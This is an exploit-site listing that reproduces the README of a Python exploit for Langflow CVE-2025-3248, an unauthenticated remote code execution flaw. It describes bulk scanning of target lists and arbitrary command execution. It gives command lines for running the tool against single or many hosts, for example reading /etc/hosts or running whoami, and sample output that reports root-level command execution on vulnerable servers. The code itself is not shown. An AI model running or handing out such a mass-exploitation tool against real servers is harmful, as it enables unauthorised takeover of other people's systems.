Exploit for Code Injection in Langflow CVE-2025-3248

Name: Exploit for Code Injection in Langflow CVE-2025-3248
Rating: 5 (121 reviews)

2025-06-18 | CVSS 9.8

## https://sploitus.com/exploit?id=648D4B35-4DC6-5E3A-AEA2-C669D1A54853
# Langflow CVE-2025-3248 Exploit

A Python-based exploit for CVE-2025-3248, which allows remote and unauthenticated attackers to execute arbitrary code on vulnerable Langflow instances through crafted HTTP requests.

## Features

- Single URL or bulk scanning from file
- Automatic vulnerability detection
- Command execution capability
- Detailed output with timing information
- Results saved to separate files for vulnerable and non-vulnerable targets
- Benchmark statistics for scan performance


## Usage

### Single URL Scan

```bash
python CVE-2025-3248.py http://target-url -c "cat /etc/hosts"
```

### Bulk Scan from File
```bash
python CVE-2025-3248.py -f targets.txt
```

### Custom Command Execution
```bash
python CVE-2025-3248.py -f targets.txt -c "whoami"
```

## Example Output

```
[*] Progress: 1/10 URLs checked
[*] Checking https://example.com
[+] Vulnerable - Command Output:
uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------

[*] Scan Summary:
[+] Total URLs checked: 10
[+] Vulnerable URLs: 3
[+] Not Vulnerable URLs: 7
[*] Total scan time: 25.34s
[*] Results saved to files with timestamp
```
source: https://github.com/verylazytech